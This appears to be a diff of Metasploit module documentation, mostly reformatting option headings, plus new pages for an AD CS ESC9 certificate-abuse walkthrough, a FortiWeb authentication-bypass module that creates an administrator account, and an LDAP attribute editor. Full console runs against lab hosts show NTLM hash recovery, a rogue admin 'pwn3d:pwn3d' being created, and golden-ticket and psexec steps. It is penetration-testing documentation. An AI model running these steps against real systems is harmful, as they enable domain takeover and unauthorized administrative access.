+[*] Auxiliary module execution completed
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) >
+```
+
+### ESC9 - Update dnsHostName to `dc2.kerberos.issue`
+```
+ msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username "Test2$"
+target_username => Test2$
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE dc2.kerberos.issue
+UPDATE_LDAP_OBJECT_VALUE => dc2.kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT dnsHostName
+UPDATE_LDAP_OBJECT => dNSHostName
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CA kerberos-DC2-CA
+CA => kerberos-DC2-CA
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CERT_TEMPLATE ESC9-Template-Dns
+CERT_TEMPLATE => ESC9-Template-Dns
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername Test1$
+ldapusername => Test1$
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of Test2$'s dNSHostName:
+[*] Attempting to update dNSHostName for CN=Test2,CN=Computers,DC=kerberos,DC=issue to dc2.kerberos.issue...
+[+] Successfully updated CN=Test2,CN=Computers,DC=kerberos,DC=issue's dNSHostName to dc2.kerberos.issue
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for Test2$
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250730093954_default_172.16.199.200_windows.ad.cs_384135.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 44760c6e-8637-598a-ad8e-04aa4b99ee58
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for Test2$
+[!] Warning: Provided principal and realm (Test2$@kerberos.issue) do not match entries in certificate:
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250730093954_default_172.16.199.200_mit.kerberos.cca_631833.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for Test2$@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250730093954_default_172.16.199.200_mit.kerberos.cca_923562.bin
+[+] Found NTLM hash for Test2$: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 - Certificate DNS: dc2.kerberos.issue
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250730093956_default_172.16.199.200_windows.ad.cs_337994.pfx
+[*] 172.16.199.200:445 - Removing shadow credential
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[+] Deleted entry with device ID 44760c6e-8637-598a-ad8e-04aa4b99ee58
+[*] 172.16.199.200:445 - Reverting ldap object
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Attempting to delete attribute dNSHostName from CN=Test2,CN=Computers,DC=kerberos,DC=issue...
+[+] Successfully deleted attribute dNSHostName from CN=Test2,CN=Computers,DC=kerberos,DC=issue
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+
+For more exploit scenarios that this module can exploit, refer to the [[Attacking-AD-CS-ESC-Vulnerabilities|./ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md]] documentation.
@@ -61,6 +61,12 @@ Username to request on behalf of. This is in the format `$domain\\$username`.

 The digest algorithm to use for cryptographic signing operations.

+When set to `true`, the module will use strong URL to SID mapping when requesting a certificate that contains a URL SAN.
+This is done by adding the `tag:microsoft.com,2022-09-14:sid:` part to the SAN which is formatted like so:
+`URL=tag:microsoft.com,2022-09-14:sid:<value>`. This option was introduced to maintain compatibility with older windows
+versions as this is not compatible with versions prior to Windows Server Preview Build 25246.
+[More info](https://techcommunity.microsoft.com/blog/askds/preview-of-san-uri-for-certificate-strong-mapping-for-kb5014754/3789785)
+
 ## Actions

 ### REQUEST_CERT
@@ -11,11 +11,11 @@ This module exploits the CVE-2017-12542 for authentication bypass on HP iLO, whi

 ## Options

-  **USERNAME**
+### USERNAME

  The username of the new administrator account. Defaults to a random string.

-  **PASSWORD**
+### PASSWORD

  The password of the new administrator account. Defaults to a random string.

@@ -39,4 +39,4 @@ msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run
 [+] Account test_user/test_password created successfully.
 [*] Auxiliary module execution completed
 msf auxiliary(admin/hp/hp_ilo_create_admin_account) > 
-```
+```
@@ -0,0 +1,114 @@
+## Vulnerable Application
+This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet
+FortiWeb management interface to create a new local administrator user account. This vulnerability affects the
+following versions:
+
+* FortiWeb `8.0.0` through `8.0.1` (Patched in `8.0.2` and above).
+* FortiWeb `7.6.0` through `7.6.4` (Patched in `7.6.5` and above).
+* FortiWeb `7.4.0` through `7.4.9` (Patched in `7.4.10` and above).
+* FortiWeb `7.2.0` through `7.2.11` (Patched in `7.2.12` and above).
+* FortiWeb `7.0.0` through `7.0.11` (Patched in `7.0.12` and above).
+
+## Testing
+Download a suitable FortiWeb-VM image and create a new VM. When creating the VM, assign the first network interface to a
+network you can target later (e.g. your external network), optionally, assign the second network interface to a private
+network. Power on the VM, and login to the console with the default username `admin` and a blank password. You will be
+asked to create a new admin password. Once you are at the CLI, you can assign an IP address to the management
+interface (on `port1`) for your (external) network:
+
+```
+FortiWeb # config system interface 
+
+FortiWeb (interface) # edit port1 
+
+FortiWeb (port1) # set ip 192.168.86.200 255.255.255.0
+
+FortiWeb (port1) # end
+
+FortiWeb #
+```
+
+You should now be able to access the management interface via HTTPS, e.g. `https://192.168.86.200/login`.
+
+## Options
+
+### NEW_USERNAME
+Username to use when creating a new admin account (Defaults to a random value).
+
+### NEW_PASSWORD
+Password to use when creating a new admin account (Defaults to a random value).
+
+## Advanced Options
+
+The following advanced options do not need to be changed against a target in a default configuration.
+
+### FORTIWEB_ACCESS_PROFILE
+The access profile to use for the new admin account (Defaults to `prof_admin`).
+
+### FORTIWEB_DOMAIN
+The domain to use for the new admin account (Defaults to `root`).
+
+### FORTIWEB_DEFAULT_ADMIN_ACCOUNT
+The default FortiWeb admin account name (Defaults to `admin`).
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use auxiliary/admin/http/fortinet_fortiweb_create_admin`
+
+Configure the target:
+
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_HTTP_OR_HTTPS_PORT>` (If different from the default of 443)
+5. `set SSL true` (Or set to false if targeting HTTP)
+
+Configure the new admin account you will create. The module will supply a default random value for these.
+
+6. `set NEW_USERNAME <NEW_ADMIN_NAME>`
+7. `set NEW_PASSWORD <NEW_ADMIN_PASSWORD>`
+
+Run the module:
+
+8. `check`
+9. `run`
+
+Verify you can login using the new admin account you just created:
+
+10. Browse to `https://<TARGET_IP_ADDRESS>:<TARGET_HTTP_OR_HTTPS_PORT>/login` and login using `<NEW_ADMIN_NAME>:<NEW_ADMIN_PASSWORD>`
+
+## Scenarios
+
+### Example 1 (Success against FortiWeb 8.0.1)
+
+```
+msf > use auxiliary/admin/http/fortinet_fortiweb_create_admin 
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set RHOST 192.168.86.202
+RHOST => 192.168.86.202
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set NEW_USERNAME pwn3d
+NEW_USERNAME => pwn3d
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set NEW_PASSWORD pwn3d
+NEW_PASSWORD => pwn3d
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
+[*] 192.168.86.202:443 - The target appears to be vulnerable.
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > run
+[*] Running module against 192.168.86.202
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] New admin account successfully created: pwn3d:pwn3d
+[+] Login via https://192.168.86.202:443/login
+[*] Auxiliary module execution completed
+```
+
+### Example 2 (Failure against FortiWeb 8.0.2)
+
+```
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set RHOST 192.168.86.200
+RHOST => 192.168.86.200
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
+[*] 192.168.86.200:443 - The target is not exploitable. Received a 403 Forbidden response
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > run autocheck=false
+[*] Running module against 192.168.86.200
+[!] AutoCheck is disabled, proceeding with exploitation
+[-] Auxiliary aborted due to failure: not-vulnerable: Target does not appear vulnerable (403 Forbidden response)
+[*] Auxiliary module execution completed
+```
@@ -23,7 +23,7 @@

 ## Options

-  **rport**
+### rport

  The default is set to `8180`, which is only default on FreeBSD.  All other operating systems, and the software itself, default to `8080`.

@@ -10,11 +10,11 @@ To exploit the vulnerability, the module generates requests and sets a value for

 ## Options

-**PATTERN1** and **PATTERN2**
+### PATTERN1 and PATTERN2

 These patterns are used to determine whether the news articles have been reordered. By default, the module will search for headlines and set the first identified headline to PATTERN1 and the second to PATTERN2.

-**ID**
+### ID

 The value for query parameter `id` of the page that the news extension is running on.

@@ -22,7 +22,7 @@ Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative pa

 ## Options

-**PATH**
+### PATH

 This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)

@@ -298,14 +298,14 @@ host             service  type                 name  content                   i
 TGS using a previously forged golden ticket:

 ```
-# Forge a golden ticket
+# 1. Forge a golden ticket
 msf auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN aes_key=dac659cec15c80bb2bc8b26cdd3f29076cff84da7ab7ec6cf9dfc2cafa33e087 domain_sid=S-1-5-21-2771926996-166873999-4256077803 domain=dev.demo.local spn=krbtgt/DEV.DEMO.LOCAL user=Administrator

 [*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin
 [*] Auxiliary module execution completed


-# Request a silver ticket:
+# 2. Request a silver ticket:

 msf auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5 Krb5Ccname=/Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin username=Administrator domain=dev.demo.local spn=cifs/dc02.dev.demo.local
 [*] Running module against 10.10.11.5
@@ -317,7 +317,7 @@ msf auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5
 [+] 10.10.11.5:88 - Received a valid delegation TGS-Response
 [*] Auxiliary module execution completed

-# Use psexec:
+# 3. Use psexec:

 msf exploit(windows/smb/psexec) > run rhost=10.10.11.5 smbdomain=dev.demo.local username=Administrator smb::auth=kerberos smb::krb5ccname=/Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin smb::rhostname=dc02.dev.demo.local domaincontrollerrhost=10.10.11.5 lhost=192.168.123.1

@@ -22,18 +22,18 @@ The required options are based on the action being performed:
 - When changing a password, you must specify the `LDAPUsername` and `LDAPPassword`, even if using an existing session (since the API requires both of these to be specified, even for open LDAP sessions)
 - The `NEW_PASSWORD` option must always be provided

-**LDAPUsername**
+### LDAPUsername

 The username to use to authenticate to the server. Required for changing a password, even if using an existing session.

-**LDAPPassword**
+### LDAPPassword

 The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).

-**TARGET_USER**
+### TARGET_USER

 For resetting passwords, the user account for which to reset the password. The authenticated account (username) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)

-**NEW_PASSWORD**
+### NEW_PASSWORD

-The new password to set.
+The new password to set.
@@ -0,0 +1,172 @@
+## Description
+
+The `ldap_object_attribute` module allows users to read, create, update or delete attributes of LDAP objects in an Active Directory environment.
+This module is flexible, enabling users to specify the target object and the attribute they wish to interact with.
+
+## Verification Steps
+
+### Action Update
+1. On the target host determine the current UPN value of the user you wish to update:
+```powershell
+PS C:\Users\Administrator> Get-ADUser -Identity user2 -Properties UserPrincipalName | Select-Object UserPrincipalName
+
+UserPrincipalName
+-----------------
+user2
+```
+1. Start `msfconsole`
+1. Do: `use auxiliary/gather/ldap_object_attribute`
+1. Do: `set RHOST [IP]`
+1. Do: `set LDAPDomain [DOMAIN]`
+1. Do: `set LDAPUsername [USERNAME]`
+1. Do: `set LDAPPassword [PASSWORD]`
+1. Do: `set TARGET_USERNAME [TARGET_USERNAME]`
+1. Do: `set ATTRIBUTE userPrincipalName`
+1. Do: `set OBJECT_LOOKUP sAMAccountName`
+1. Do: `set OBJECT [User you wish to update]`
+1. Do: `set VALUE [New value for the attribute (e.g., Administrator)]`
+1. Do: `set ACTION update`
+1. Do: `run`
+1. Verify the attribute has been updated successfully:
+```powershell
+PS C:\Users\Administrator> Get-ADUser -Identity user2 -Properties UserPrincipalName | Select-Object UserPrincipalName
+
+UserPrincipalName
+-----------------
+Administrator
+```
+
+## Options
+
+### OBJECT
+The username of the target LDAP object whose attribute you want to update. This is used to locate the specific object in the LDAP directory.
+
+### OBJECT_LOOKUP
+How to look up the target LDAP object. This can either be done by specifying a DN or by specifying `sAMAaccountName` in order to work with AD account attributes. 
+
+### ATTRIBUTE
+The LDAP attribute to update. For example, `userPrincipalName` can be used to update the User Principal Name of the target object.
+
+### VALUE
+Required when running "Update" or "Create" actions and is the value of the specified attribute that you want to set for the target object.
+
+## Scenarios
+### Action `Update`
+
+```
+msf6 auxiliary(gather/ldap_object_attribute) > set action update
+action => update
+msf6 auxiliary(gather/ldap_object_attribute) > set rhost 172.16.199.200
+rhost => 172.16.199.200
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPDomain kerberos.issue
+LDAPDomain => kerberos.issue
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPUsername user1
+LDAPUsername => user1
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPPassword N0tpassword!
+LDAPPassword => N0tpassword!
+msf6 auxiliary(gather/ldap_object_attribute) > set OBJECT user2
+OBJECT => user2
+msf6 auxiliary(gather/ldap_object_attribute) > set OBJECT_LOOKUP sAMAccountName
+OBJECT_LOOKUP => sAMAccountName
+msf6 auxiliary(gather/ldap_object_attribute) > set ATTRIBUTE userPrincipalName
+ATTRIBUTE => userPrincipalName
+msf6 auxiliary(gather/ldap_object_attribute) > set VALUE Administrator
+VALUE => Administrator
+msf6 auxiliary(gather/ldap_object_attribute) > run
+[*] Running module against 172.16.199.200
+[*] Discovering base DN automatically
+[*] Original value of user2's userPrincipalName:
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+
+### Action `Read`
+```
+msf6 auxiliary(gather/ldap_object_attribute) > set action read
+action => read
+msf6 auxiliary(gather/ldap_object_attribute) > set rhost 172.16.199.200
+rhost => 172.16.199.200
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPDomain kerberos.issue
+LDAPDomain => kerberos.issue
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPUsername user1
+LDAPUsername => user1
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPPassword N0tpassword!
+LDAPPassword => N0tpassword!
+msf6 auxiliary(gather/ldap_object_attribute) > set OBJECT user2
+OBJECT => user2
+msf6 auxiliary(gather/ldap_object_attribute) > set OBJECT_LOOKUP sAMAccountName
+OBJECT_LOOKUP => sAMAccountName
+msf6 auxiliary(gather/ldap_object_attribute) > set ATTRIBUTE userPrincipalName
+ATTRIBUTE => userPrincipalName
+msf6 auxiliary(gather/ldap_object_attribute) > run
+[*] Running module against 172.16.199.200
+[*] Discovering base DN automatically
+[+] Found CN=user2,CN=Users,DC=kerberos,DC=issue with userPrincipalName set to Administrator
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+
+### Action `Delete`
+```
+msf6 auxiliary(gather/ldap_object_attribute) > set action delete
+action => delete
+msf6 auxiliary(gather/ldap_object_attribute) > set rhost 172.16.199.200
+rhost => 172.16.199.200
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPDomain kerberos.issue
+LDAPDomain => kerberos.issue
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPUsername user1
+LDAPUsername => user1
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPPassword N0tpassword!
+LDAPPassword => N0tpassword!
+msf6 auxiliary(gather/ldap_object_attribute) > set OBJECT user2
+OBJECT => user2
+msf6 auxiliary(gather/ldap_object_attribute) > set OBJECT_LOOKUP sAMAccountName
+OBJECT_LOOKUP => sAMAccountName
+msf6 auxiliary(gather/ldap_object_attribute) > set ATTRIBUTE userPrincipalName
+ATTRIBUTE => userPrincipalName
+msf6 auxiliary(gather/ldap_object_attribute) > run
+[*] Running module against 172.16.199.200
+[*] Discovering base DN automatically
+[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
+[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+
+### Action `Create` 
+```
+msf6 auxiliary(gather/ldap_object_attribute) > set action create
+action => create
+msf6 auxiliary(gather/ldap_object_attribute) > set rhost 172.16.199.200
+rhost => 172.16.199.200
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPDomain kerberos.issue
+LDAPDomain => kerberos.issue
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPUsername user1
+LDAPUsername => user1
+msf6 auxiliary(gather/ldap_object_attribute) > set LDAPPassword N0tpassword!
+LDAPPassword => N0tpassword!
+msf6 auxiliary(gather/ldap_object_attribute) > set OBJECT user2
+OBJECT => user2
+msf6 auxiliary(gather/ldap_object_attribute) > set OBJECT_LOOKUP sAMAccountName
+OBJECT_LOOKUP => sAMAccountName
+msf6 auxiliary(gather/ldap_object_attribute) > set ATTRIBUTE userPrincipalName
+ATTRIBUTE => userPrincipalName
+msf6 auxiliary(gather/ldap_object_attribute) > set VALUE Administrator
+VALUE => Administrator
+msf6 auxiliary(gather/ldap_object_attribute) > run
+[*] Reloading module...
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Running module against 172.16.199.200
+[*] Discovering base DN automatically
+[*] Attempting to add attribute userPrincipalName with value asdfasdf to CN=user2,CN=Users,DC=kerberos,DC=issue...
+[+] Successfully added attribute userPrincipalName with value asdfasdf to CN=user2,CN=Users,DC=kerberos,DC=issue
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+
+## Notes
+
+- Ensure the user account used for authentication has sufficient privileges to modify the specified attribute.
+- Use caution when modifying LDAP attributes, as incorrect changes can disrupt directory services.
@@ -9,15 +9,15 @@ Windows is the most ideal target because it supports WPAD by default.

 ## Options

-**NBADDR**
+### NBADDR

 The address that the NetBIOS name (NBNAME) should resolve to.

-**NBNAME**
+### NBNAME

 The NetBIOS name to spoof a reply for.

-**PPSRATE**
+### PPSRATE

 The rate at which to send NetBIOS replies.

@@ -25,19 +25,19 @@ List the steps needed to make sure this thing works

 ## Options

-**RHOSTS**
+### RHOSTS

 Set the target host.

-**USERNAME**
+### USERNAME

 Set the USERNAME of the admin account you want to add.

-**PASSWORD**
+### PASSWORD

 Set the PASSWORD of the admin account you want to add.

-**RETRIES**
+### RETRIES

 You can change the maximum number of attempts to add an admin account by using `set RETRIES <max_retries>`.

@@ -19,10 +19,10 @@

 ## Options

-  **SQL**
+### SQL

  The SQL that will execute with the privileges of the user who created the index. Default is to escalate privileges.

-  **TABLE**
+### TABLE

  Table to create the index on.
@@ -103,11 +103,7 @@

 ## Options

-  **RHOST**
-
-  Target device.
-
-  **FUNCTION**
+### FUNCTION

  Either CREDS (default) or ENUM:
  * CREDS attempts to retrieve administrative password and SNMP community strings
@@ -174,4 +170,4 @@ if response[0] == "\x81" && response[14..16] == "\x00\x90\xe8" && response.lengt
  ```
  Note that the above response is an example of the utility of using ENUM.  This function code (0x14) returns a netstat-type response.  Output similar to the above will be displayed for every function code that does not return 'invalid' (0x4).  This may also be useful for devices that do not "unlock" using the function codes supplied in this module; by running through all function codes in sequence, it is likely that an alternate "unlock" function will be sent prior to any function codes that request credentials.

-  NOTE: As the protocol is undocumented and the purpose of a majority of the function codes are unknown, undesired results are possible.  Do NOT use on devices which are mission-critical!
+  NOTE: As the protocol is undocumented and the purpose of a majority of the function codes are unknown, undesired results are possible.  Do NOT use on devices which are mission-critical!
@@ -89,7 +89,7 @@ The CPU mode uses a TCP port depending on the PLC Type, the module will
 automatically detect the type and port to use, but can be overridden with the
 'RPORT' option, however no real reason to configure it. If you accidentally set RPORT, you can unset it with the ```unset RPORT``` command.

-**The ACTION option**
+### ACTION

 Action has four possible values:

@@ -25,22 +25,22 @@ The required options are based on the action being performed:
 - When resetting or changing a password, you must specify `NEW_PASSWORD`
 - When resetting or changing an NTLM hash, you must specify `NEW_NTLM`

-**SMBUser**
+### SMBUser

 The username to use to authenticate to the server. Required for changing a password, even if using an existing session.

-**SMBPass**
+### SMBPass

 The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).

-**TARGET_USER**
+### TARGET_USER

 For resetting passwords, the user account for which to reset the password. The authenticated account (SMBUser) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)

-**NEW_PASSWORD**
+### NEW_PASSWORD

 The new password to set for `RESET` and `CHANGE` actions. 

-**NEW_NTLM**
+### NEW_NTLM

-The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
+The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
@@ -41,23 +41,23 @@ msf exploit(psexec) > exploit

 By default, using auxiliary/admin/smb/ms17_010_command can be as simple as setting the RHOSTS option, and you're ready to go.

-**The NAMEDPIPE Option**
+### The NAMEDPIPE Option

 By default, the module will scan for a list of common pipes for any available one. You can specify one by name.

-**The LEAKATTEMPTS Option**
+### The LEAKATTEMPTS Option

 Information leaks are used to ensure stability of the exploit. Sometimes they don't pop on the first try.

-**The DBGTRACE Option**
+### The DBGTRACE Option

 Used to debug, gives extremely verbose information.

-**The SMBUser Option**
+### The SMBUser Option

 This is a valid Windows username.

-**The SMBPass option**
+### The SMBPass option

 This can be either the plain text version or the Windows hash.

@@ -65,7 +65,7 @@ This can be either the plain text version or the Windows hash.

 **Automatic Target**

-There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
+There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the native upload. Each target is explained below.

 **Powershell Target**

@@ -38,37 +38,37 @@ accordingly.
 12. Apply the acquired session cookie for the vCenter host at the `/ui` path

 ## Options
-**DOMAIN**
+### DOMAIN

 The vSphere SSO domain; by default this is `vsphere.local`. If this does not match the vSphere SSO
 domain, the module will return `HTTP 400: Issuer not trusted` on execution.

-**USERNAME**
+### USERNAME

 The target user within the SSO domain. This must be a valid user as vCenter will happily issue
 SAML assertions for invalid usernames, but the provided session tokens will not function. There
 should be no reason to modify the target user from the default `administrator` in most scenarios.

-**RHOSTS**
+### RHOSTS

 The vCenter appliance IPv4 address or DNS FQDN. This must be reachable over HTTPS for the module
 to function.

-**VHOST**
+### VHOST

 The fully qualified DNS name of the vCenter appliance; this must be present in the Issuer element
 of the assertion for the module to function. If this value does not match the vCenter appliance
 FQDN, the module will return `HTTP 400` during the initial `GET` request.

-**VC_IDP_CERT**
+### VC_IDP_CERT

 The filesystem path to the vCenter SSO IdP certificate in DER or PEM format.

-**VC_IDP_KEY**
+### VC_IDP_KEY

 The filesystem path to the vCenter SSO IdP private key in DER or PEM format.

-**VC_VMCA_CERT**
+### VC_VMCA_CERT

 The filesystem path to the vCenter VMCA certificate in DER or PEM format.

@@ -30,15 +30,15 @@ value is provided for `VC_IP` the module defaults to assigning the loopback IP `
 7. Do: `dump`

 ## Options
-**VMDIR_MDB**
+### VMDIR_MDB

 Path to the vmdird MDB database file on the local system. Example: `/tmp/data.mdb`

-**VMAFD_DB**
+### VMAFD_DB

 Path to the vmafd DB file on the local system. Example: `/tmp/afd.db`

-**VC_IP**
+### VC_IP

 Optional parameter to set the IPv4 address associated with loot entries made by the module.

@@ -21,16 +21,16 @@ Stop  Stop cooking

 ## Options

-**TEMP**
+### TEMP

 Set this to the desired temperature for cooking. Valid values are `Off`,
 `Warm`, `Low`, and `High`.

-**TIME**
+### TIME

 Set this to the desired cook time in full minutes.

-**DefangedMode**
+### DefangedMode

 Set this to `false` to disable defanged mode and enable module
 functionality. Set this only if you're SURE you want to proceed.
@@ -12,7 +12,7 @@ Tested with Schneider TM221CE16R

 ## Options

-**MODE**
+### MODE

 Default: UPLOAD. Changes offset within a packet that is used to check for a zip header.

@@ -47,12 +47,12 @@ on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali

 ## Options

- **TARGETURI**
+### TARGETURI

 Specifies the base target URI to communicate to the HWBridge API.  By default this is '/' but it
 could be things such as '/api' or the randomly generated URI from the local_hwbridge module

- **DEBUGJSON**
+### DEBUGJSON

 Prints out all the JSON packets that come from the HWBridge API.  Useful for troubleshooting
 a device.
@@ -8,7 +8,7 @@ mail services such as Gmail, Yahoo, Live should work fine.

 ## Options

-**CELLNUMBERS**
+### CELLNUMBERS

 The 10-digit phone number (or numbers) you want to send the MMS text to. If you wish to target
 against multiple phone numbers, ideally you want to create the list in a text file (one number per
@@ -20,12 +20,12 @@ set CELLNUMBERS file:///tmp/att_phone_numbers.txt

 Remember that these phone numbers must be the same carrier.

-**MMSCARRIER**
+### MMSCARRIER

 The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
 supported carriers.

-**TEXTMESSAGE**
+### TEXTMESSAGE

 The text message you want to send. For example, this will send a text with a link to google:

@@ -35,11 +35,11 @@ set TEXTMESSAGE "Hi, please go: google.com"

 The link should automatically be parsed on the phone and clickable.

-**MMSFILE**
+### MMSFILE

 The attachment to send in the message.

-**MMSFILECTYPE**
+### MMSFILECTYPE

 The content type to use for the attachment. Commonly supported ones include:

@@ -51,28 +51,28 @@ The content type to use for the attachment. Commonly supported ones include:

 To find more, please try this [list](http://www.freeformatter.com/mime-types-list.html)

-**SMTPADDRESS**
+### SMTPADDRESS

 The mail server address you wish to use to send the MMS messages.

-**SMTPPORT**
+### SMTPPORT

 The mail server port. By default, this is ```25```.

-**SMTPUSERNAME**
+### SMTPUSERNAME

 The username you use to log into the SMTP server.

-**SMTPPASSWORD**
+### SMTPPASSWORD

 The password you use to log into the SMTP server.

-**SMTPFROM**
+### SMTPFROM

 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```. Some carriers require this
 in order to receive the text, such as AT&T.

-**MMSSUBJECT**
+### MMSSUBJECT

 The MMS subject. Some carriers require this in order to receive the text, such as AT&T.

@@ -8,7 +8,7 @@ mail services such as Gmail, Yahoo, Live should work fine.

 ## Options

-**CELLNUMBERS**
+### CELLNUMBERS

 The 10-digit phone number (or numbers) you want to send the text to. If you wish to target against
 multiple phone numbers, ideally you want to create the list in a text file (one number per line),
@@ -20,16 +20,16 @@ set CELLNUMBERS file:///tmp/att_phone_numbers.txt

 Remember that these phone numbers must be the same carrier.

-**SMSCARRIER**
+### SMSCARRIER

 The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
 supported carriers.

-**SMSSUBJECT**
+### SMSSUBJECT

 The text subject.

-**SMSMESSAGE**
+### SMSMESSAGE

 The text message you want to send. For example, this will send a text with a link to google:

@@ -39,23 +39,23 @@ set SMSMESSAGE "Hi, please go: google.com"

